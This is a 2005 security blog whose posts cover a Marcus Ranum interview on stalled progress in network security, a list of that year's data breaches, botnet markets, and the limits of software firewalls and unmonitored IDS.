Must read interview with Marcus Ranum, a major player in the security world at Security Focus. He has several excellent comments on the state of the industry and some of the fundamental issues that still plague network security.

Do you see any new, interesting, or promising path for network security?

Nope! I see very little that's new and even less that's interesting. The truth is that most of the problems in network security were fairly well-understood by the late 1980's. What's happening is that the same ideas keep cropping up over and over again in different forms. For example, how many times are we going to re-invent the idea of signature-based detection? Anti-virus, Intrusion detection, Intrusion Prevention, Deep Packet Inspection - they all do the same thing: try to enumerate all the bad things that can happen to a computer. It makes more sense to try to enumerate the good things that a computer should be allowed to do.

I believe we're making zero progress in computer security, and have been making zero progress for quite some time. Consider this: it's 2005 and people still get viruses. How much progress are we making, really? If we can't get a handle on relatively simple problems such as controlled execution and filesystem/kernel permissions, how much progress are we going to make on the really hard problems of security, such as dealing with transitive trust? It's 2005, and IT managers still don't seem to know how to build networks that don't collapse when a worm gets loose on them. Security thinkers realized back in the early 80's that networks were a good medium for attack propagation and that networks would need to be broken into separate security domains with gateways between them. None of this is rocket science - I think that what we're seeing today is the results of this massive exuberance in the late 1990's in which everyone rushed to put all their mission critical assets onto these poorly protected networks that they then hooked to the Internet. That was a dumb idea, and that fact just hasn't sunk in, yet.

posted by mt at 12:33

Some quick items.

- New article should be up next week at Security Focus.

- We're working on a new product, somewhat in the security arena. It's a USB flash drive running Linux with several anonymizing features designed to protect identity and privacy. Small enough to bring everywhere and use it when need be. Ghoststick. If you're interested in learning more, I suggest registering at the main site. No need to enter a real name, I never do ;). I promise no spam, just product related updates. If you're interested in beta testing or have some thoughts/recommendations - send a comment here.
posted by mt at 11:57

Summary article from the Dallas morning news. A great list of incidents is listed below. Date, company, breach, # of id's.

Feb. 15 ChoicePoint ID thieves accessed 145,000
Feb. 25 Bank of America Lost backup tape 1,200,000
Feb. 25 PayMaxx Exposed online 25,000
March 10 LexisNexis Passwords compromised 32,000
March 11 University of California, Berkeley Stolen laptop 98,400
March 11 Boston College Hacking 120,000
March 12 Nevada Department of Motor Vehicles Stolen computer 8,900
March 20 Northwestern University Hacking 21,000
March 20 University of Nevada, Las Vegas Hacking 5,000
March 22 California State University, Chico Hacking 59,000
March 23 University of California, San Francisco Hacking 7,000
March 28 DSW/Retail Ventures Hacking 100,000
April Georgia DMV Dishonest insider Hundreds of thousands
April 5 MCI Stolen laptop 16,500
April 8 San Jose Medical Group Stolen computer 185,000
April 11 Tufts University Hacking 106,000
April 12 LexisNexis Passwords compromised 280,000
April 14 Polo Ralph Lauren/HSBC Hacking 180,000
April 14 California FasTrak Dishonest insider 4,500
April 15 California Department of Health Services Stolen laptop 21,600
April 18 DSW/Retail Ventures Hacking 1,300,000
April 20 Ameritrade Lost backup tape 200,000
April 21 Carnegie Mellon University Hacking 19,000
April 26 Michigan State University's Wharton Center Hacking 40,000
April 26 Christus St. Joseph's Hospital Stolen computer 19,000
April 28 Georgia Southern University Hacking Tens of thousands
April 28 Wachovia, Bank of America, PNC Financial Services Group and Commerce Bancorp Dishonest insiders 676,000
April 29 Oklahoma State University Missing laptop 37,000
May 2 Time Warner Lost backup tapes 600,000
May 4 Colorado Health Department Stolen laptop 1,600
May 5 Purdue University Hacker 11,360
May 7 Department of Justice Stolen laptop 80,000
May 11 Stanford University Hacker 9,900
May 12 Hinsdale (Ill.) Central High School Hacker 2,400
May 16 Westborough Bank Dishonest insider 750
May 18 Jackson (Mich.) Community College Hacker 8,000
May 19 Valdosta State University Hacker 40,000
May 20 Purdue University Hacker 11,000
May 22 CardSystems Hacker 40,000,000
May 26 Duke University Hacker 5,500
May 27 Cleveland State University Stolen laptop 44,420
May 28 Merlin Data Services Bogus acct. set up 9,000
May 30 Motorola Computers stolen unknown
June 6 CitiFinancial Lost backup tapes 3,900,000
June 10 Federal Deposit Insurance Corp. Not disclosed 6,000
Total: About 50 million

posted by mt at 11:45

A NYTime's piece on the stolen identity trade. This quote from the former head of the DOJ's cyber investigations unit (now in the private sector) should make everyone cringe:

And, Mr. Rasch pointed out, it is nearly impossible to stop. For all the information that law enforcement and security experts can glean from sites like iaaca.com, "there are whole marketplaces of bulletin board systems and chats that are invisible," he said.

At least he's honest...
posted by mt at 15:10

This article examines the history of malicious software and the direction it's headed. I found the piece below extremely accurate.

Another important factor is that those releasing the malware that introduce the backdoors will not necessarily be those that ultimately exploit the compromised systems. A supply chain is emerging. Botnet 'herders' will pay hackers for their botnets. Indeed, botnets are turning up in a marketplace -- with evidence of them even appearing on online auction sites. Your compromised system really can be sold to the highest bidder! The fact that the malware now effectively feeds off the infected system means that it now meets our third criterion of an effective parasite.

When considering where the money is being made, it is relevant to ask whose systems are getting compromised. Unsurprisingly, the answer is often those with the least ability to protect themselves -- such as small and medium enterprises and domestic users, all of whom often lack the money and expertise to tackle the problem effectively.

posted by mt at 13:44

Interesting article on the risks of software firewalls. It's the second in a two part series.

With this scenario in mind, and bearing in mind how an LSP Trojan works, the question we need to ask ourselves is: will the defensive measures in this network contain the attack? As we already know from the information we have discussed above, the firewall itself is woefully inadequate to protect against this type of exploit. However, the method of transfer would be detected as TFTP activity by any competent IDS out there today. The problem is that many of these other defensive appliances are rarely monitored. That is a sad but true statement in many cases. Furthermore, even when these appliances are monitored there is a strong possibility that the person who is reading the output does not have the requisite training, or knowledge, to understand the information they are seeing. In some cases, large networks receive hundreds of thousands of alerts every day.

The problem of an intrusion detection system going unmonitored, or misinterpreted is unfortunately an all too common one. Too many corporations invest in the technology yet do not invest in the human side of the equation to manage and monitor the equipment.

posted by mt at 13:38